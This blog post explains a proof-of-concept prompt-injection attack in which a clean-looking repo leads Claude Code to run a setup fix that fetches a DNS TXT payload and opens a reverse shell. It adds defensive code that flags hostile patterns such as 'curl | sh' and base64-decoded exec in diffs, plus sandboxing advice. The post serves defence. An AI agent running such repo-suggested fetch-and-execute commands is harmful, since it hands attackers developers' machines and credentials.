AI Coding Agents: Navigating the Hidden Risks in Clean GitHub Repos

By Dave · 7 min read

The 0DIN proof-of-concept is the kind of research the AI coding space needed and didn't want. Mozilla's offensive-security team built a clean-looking GitHub repo, handed it to Claude Code, and watched Anthropic's agent run a command that opened a reverse shell on the developer's machine. No malicious code in the repo. No obviously hostile instructions. Just a normal Python setup flow, a routine error, and a fix the agent was eager to run.

That is a genuinely clever attack. It targets the trust contract between a developer and an agent, not the codebase itself. Every other line of defense in the software supply chain (code review, dependency scanning, signature checks, license audits) assumes the bytes on disk are the thing that matters. The 0DIN attack moves the malicious payload to a DNS TXT record fetched at runtime, so the bytes on disk stay clean. Static analyzers have nothing to flag. Human reviewers have nothing to see. The agent is told to "fix the setup error" and does exactly that, with hostile results.

The research is real, the demo is reproducible, and the 0DIN writeup on eWEEK lays it out cleanly. It also lands the same week as a broader study of agentic coding editors that analyzed 314 prompt-injection payloads across 70 MITRE ATT&CK techniques and found success rates as high as 84%. One reproducible PoC plus a high success rate across many techniques is the kind of evidence base that should change how teams ship these tools.

How the 0DIN proof-of-concept actually works

The repository in the demo was a normal Python project. No eval, no obfuscated base64, no suspicious URLs in the source tree. Claude Code read the project as context, installed the listed requirements, and hit a routine initialization error. A README or setup script suggested a fix. The agent ran it.

The fix triggered a setup script that queried a DNS TXT record, base64-decoded the returned value, and executed the result as a shell command. That command opened a reverse shell to an attacker-controlled host. The interesting design choice is the DNS transport: DNS lookups are allowed almost everywhere, are rarely logged at the application level, and TXT records can carry arbitrary text within the protocol's size limits (255 bytes per string, with multiple strings allowed per record). The payload is effectively a dead drop.

[Figure: attack flow. Clean repo on disk; developer hands it to agent; agent reads project context; runs the doc…]

Because the payload is fetched at runtime, the final command is never written to disk in the repo. Static scanners see clean code. Dependency auditors see clean requirements.txt. The commit hash is reproducible. The hostile step happens only when the agent decides to run it.
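To make the dead-drop idea concrete, here is a minimal sketch of the decode step, written as an inspection helper that prints the decoded text instead of running it. Nothing is fetched from the network: `sample_txt` is a hypothetical stand-in for an attacker-controlled TXT value, and `inspect_txt_payload` is an illustrative name, not something from the 0DIN writeup.

```python
import base64
import binascii


def inspect_txt_payload(txt_value: str) -> str:
    """Decode a base64 TXT value for human review. Never executes the result."""
    try:
        decoded = base64.b64decode(txt_value, validate=True)
    except (binascii.Error, ValueError):
        return "<not valid base64>"
    return decoded.decode("utf-8", errors="replace")


# Hypothetical TXT value standing in for an attacker-controlled record.
# A harmless echo command is used here as the "payload".
sample_txt = base64.b64encode(b"echo hello from a TXT record").decode("ascii")

print(sample_txt)                       # opaque text; this never lives in the repo
print(inspect_txt_payload(sample_txt))  # readable only after the decode step
```

The repo only ever contains the fetch-and-decode wrapper. The string that matters lives in DNS, which is why scanning the source tree finds nothing.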

Why AI coding agents are a new attack surface

Three properties of agentic coding tools make them attractive targets:

  1. Broad ambient authority. Claude Code can read files, install dependencies, run shell commands, and reach the network. It operates under the developer's user account, which means whatever the developer can do, the agent can do — including reading ~/.aws/credentials, ~/.ssh/, browser session stores, and GitHub tokens.
  2. Prompt injection in untrusted context. A repo the agent reads is "untrusted context" from a security-model perspective, but the agent has no reliable way to know that. The 0DIN attack didn't break out of a sandbox; it got the agent to follow instructions in a file the developer told it to trust.
  3. Goal-directed behavior. The agent is trying to complete "set up this project." That goal leaves a lot of room for interpretation. Anything in the repo that nudges the agent toward a setup step becomes an attack primitive. The 84% success rate in the broader study is the empirical version of the same observation: agents are remarkably willing to take a useful-looking step.

The credential-exposure risk is what makes this a step above ordinary supply-chain attacks. A compromised npm package can exfiltrate process.env. A compromised agent can exfiltrate the developer's full interactive session, including browser cookies, SSH keys, and any secrets in shell history.
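One way to see the ambient-authority problem on your own machine is to list which sensitive locations the current user account can read, since the agent inherits the same access. The sketch below is a rough audit, not a complete inventory. Apart from `~/.aws/credentials` and `~/.ssh`, the paths are assumptions about common setups.

```python
import os
from pathlib import Path

# Paths relative to the home directory. The first two come from the text above;
# the rest are assumed locations that vary by tool and platform.
SENSITIVE_PATHS = [
    ".aws/credentials",
    ".ssh",
    ".config/gh/hosts.yml",  # assumed GitHub CLI token store
    ".bash_history",
    ".zsh_history",
]


def readable_secrets(paths, home=None):
    """Return the paths that exist under `home` and are readable by this user."""
    base = Path(home) if home else Path.home()
    found = []
    for relative in paths:
        candidate = base / relative
        if candidate.exists() and os.access(candidate, os.R_OK):
            found.append(str(candidate))
    return found


for path in readable_secrets(SENSITIVE_PATHS):
    print("an agent running as this user could read:", path)
```

Running it inside the container or VM you intend to give the agent should print nothing. If it prints anything, the sandbox is leaking your real home directory.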

Using Claude Code and similar agents safely today

The point is not to stop using these tools. They are genuinely productive. Claude Code, Cursor, and similar agents shave hours off routine work, and pretending otherwise is dishonest. The point is to use them with explicit constraints.

A few patterns that work:

  • Sandboxed shell. Run Claude Code in a container or VM with no access to your real ~/.ssh, ~/.aws, or browser profile. The tool's permissions model lets you grant specific tool scopes; deny shell by default, allow it only on disposable environments.
  • Pre-commit review of any file the agent touched. A diff in front of you is the cheapest and most reliable defense. If the agent created a setup script that runs curl | sh or python -c "$(base64 -d ...)", the diff will show it. The 0DIN attack's runtime payload is invisible — but the wrapper that fetches and decodes it is not.
  • Network egress controls. Force DNS through a logging resolver (for example over DNS-over-HTTPS), or use an outbound allowlist that blocks raw DNS to arbitrary servers. This disrupts, or at least exposes, the DNS-TXT transport used in the PoC and a long list of real-world exfiltration patterns.
  • Deny the agent network by default. The vast majority of legitimate work (reading, editing, running tests) does not require the agent to make outbound network calls. Where your agent or its sandbox offers a no-network mode or equivalent config, use it.
  • Separate credentials from agent runs. Use a short-lived GitHub fine-grained token, a scoped AWS profile with no iam:* rights, and SSH keys generated for the session. Even a successful reverse shell is contained if the credentials on the box are disposable.
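The diff-review pattern can be partly automated. The sketch below scans the added lines of a unified diff for the kind of fetch-and-decode wrapper described above. The pattern names and regexes are illustrative assumptions, deliberately crude, and will produce both false positives and misses. Treat it as a prompt for a human look, not a replacement for one.

```python
import re

# Illustrative patterns only; tune these for your own codebase.
RISKY_PATTERNS = {
    "pipe-to-shell": re.compile(r"\b(curl|wget)\b[^\n|]*\|\s*(sudo\s+)?(ba|z)?sh\b"),
    "base64-decode": re.compile(r"base64\s+(-d|--decode)\b|b64decode\s*\("),
    "dns-txt-lookup": re.compile(r"\b(dig|nslookup)\b[^\n]*\bTXT\b", re.IGNORECASE),
    "dynamic-exec": re.compile(r"\b(eval|exec)\s*\(|os\.system\s*\(|shell\s*=\s*True"),
}


def flag_added_lines(diff_text):
    """Return (pattern_name, line) pairs for risky lines added in a unified diff."""
    findings = []
    for line in diff_text.splitlines():
        # Only added lines matter; skip the "+++ b/file" header lines.
        if not line.startswith("+") or line.startswith("+++"):
            continue
        added = line[1:]
        for name, pattern in RISKY_PATTERNS.items():
            if pattern.search(added):
                findings.append((name, added.strip()))
    return findings


# Hypothetical diff of a setup script an agent might have written.
sample_diff = """\
+++ b/setup_helper.sh
+echo "installing"
+python -c "$(dig +short TXT cfg.example.invalid | base64 -d)"
-old line
 context line
"""

for name, line in flag_added_lines(sample_diff):
    print(f"{name}: {line}")
```

In practice the input would be the output of `git diff` captured after the agent's run, before anything the agent wrote is executed.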

None of this is exotic. It is the same defense-in-depth discipline that security teams have been pushing for a decade, applied to a new class of executor. The tooling already supports it; the culture is the lag.
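As one small instance of separating credentials from agent runs, the sketch below builds a scrubbed environment for launching an agent process: secret-looking variables are dropped and `HOME` points at a throwaway directory. The prefix and marker lists are assumptions. This only reduces what the process inherits. It does not stop the process from reading your real home directory by absolute path, so it complements a container or VM rather than replacing one.

```python
import os
import tempfile

# Assumed naming conventions for secret-bearing variables; extend as needed.
SECRET_PREFIXES = ("AWS_", "GITHUB_", "GH_", "SSH_")
SECRET_MARKERS = ("TOKEN", "SECRET", "PASSWORD", "KEY", "CREDENTIAL")


def scrubbed_env(env, home):
    """Copy `env` without secret-looking variables and with HOME redirected."""
    clean = {}
    for name, value in env.items():
        upper = name.upper()
        if upper.startswith(SECRET_PREFIXES):
            continue
        if any(marker in upper for marker in SECRET_MARKERS):
            continue
        clean[name] = value
    clean["HOME"] = home
    return clean


with tempfile.TemporaryDirectory() as throwaway_home:
    env = scrubbed_env(dict(os.environ), throwaway_home)
    # A real launcher would pass env=env to subprocess.run(...) here.
    dropped = sorted(set(os.environ) - set(env))
    print("variables withheld from the agent:", dropped)
```

The marker match is intentionally over-broad. Withholding a harmless variable such as one containing `KEY` costs little, while leaking a real token is the failure this is meant to prevent.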

Defense in depth: what to actually do

A short list, in priority order:

  1. Treat any code the agent runs as user-executed code. It is. Review the diff. Run it in a sandbox first.
  2. Minimize credentials on agent hosts. Use a clean user account with a rotated, scoped token set.
  3. Log and alert on agent network egress. Anything that talks to a non-allowlisted host at runtime is worth a Slack alert.
  4. Block raw DNS to the internet where the workflow allows it. Most agent work does not need it.
  5. Educate the team. A developer who runs claude against an unfamiliar repo they cloned from a random GitHub link is the realistic attack path. The 0DIN research did not need zero-days. It needed curiosity and a setup step.
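The egress-alerting item can start as a simple allowlist check over connection records. In the sketch below, the `EgressEvent` shape, the host list, and the sample events are all hypothetical. Real records would come from whatever your proxy, firewall, or endpoint agent logs.

```python
from dataclasses import dataclass

# Assumed allowlist for a Python project; adjust to your own workflow.
ALLOWED_HOSTS = {"pypi.org", "files.pythonhosted.org", "github.com"}


@dataclass(frozen=True)
class EgressEvent:
    process: str
    host: str
    port: int


def is_allowed(host, allowed):
    """True if host equals an allowed name or is a subdomain of one."""
    host = host.lower().rstrip(".")
    return any(host == name or host.endswith("." + name) for name in allowed)


def violations(events, allowed=ALLOWED_HOSTS):
    """Return the events whose destination host is not on the allowlist."""
    return [event for event in events if not is_allowed(event.host, allowed)]


# Hypothetical records from one agent session.
events = [
    EgressEvent("pip", "files.pythonhosted.org", 443),
    EgressEvent("sh", "c2.example.invalid", 4444),
    EgressEvent("git", "api.github.com", 443),
]

for event in violations(events):
    print(f"ALERT: {event.process} connected to {event.host}:{event.port}")
```

Matching on the dot-prefixed suffix rather than a plain substring keeps lookalike names such as `evilgithub.com` from slipping through.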

The durable layer under the agent churn

Here's the part that doesn't change when the model does.

AI coding agents are improving every quarter. The 0DIN research will get absorbed, defenses will get better, and the next generation of tools will have tighter defaults. That churn is healthy and worth riding.

What doesn't churn is the substrate the agent is building toward. UI components, navigation patterns, form primitives, accessibility trees, theme tokens — these are the parts of an application that should be versioned, reviewed by humans, and reproducible byte-for-byte. They are exactly the wrong place to be runtime-fetched from a network, decoded from a DNS record, or "improved" by an agent reading an untrusted README. The component layer is the part that should be local, deterministic, and human-authored.

That is the durable part of an application. Models change. Agents change. The button that triggers a destructive action, the form that collects a password, the navigation tree that defines your IA — those need to be the same on web, iOS, and Android, reviewed in a PR, and pinned in package.json. AI tools are an excellent way to compose them. They are a poor way to fetch them.

The 0DIN proof-of-concept is a wake-up call about the executor layer. It is also a quiet reminder about the value of a component layer that does not need to be fetched, decoded, or interpreted at runtime. Build the variable parts on top of AI. Build the durable parts underneath it. Review the diff in the middle.
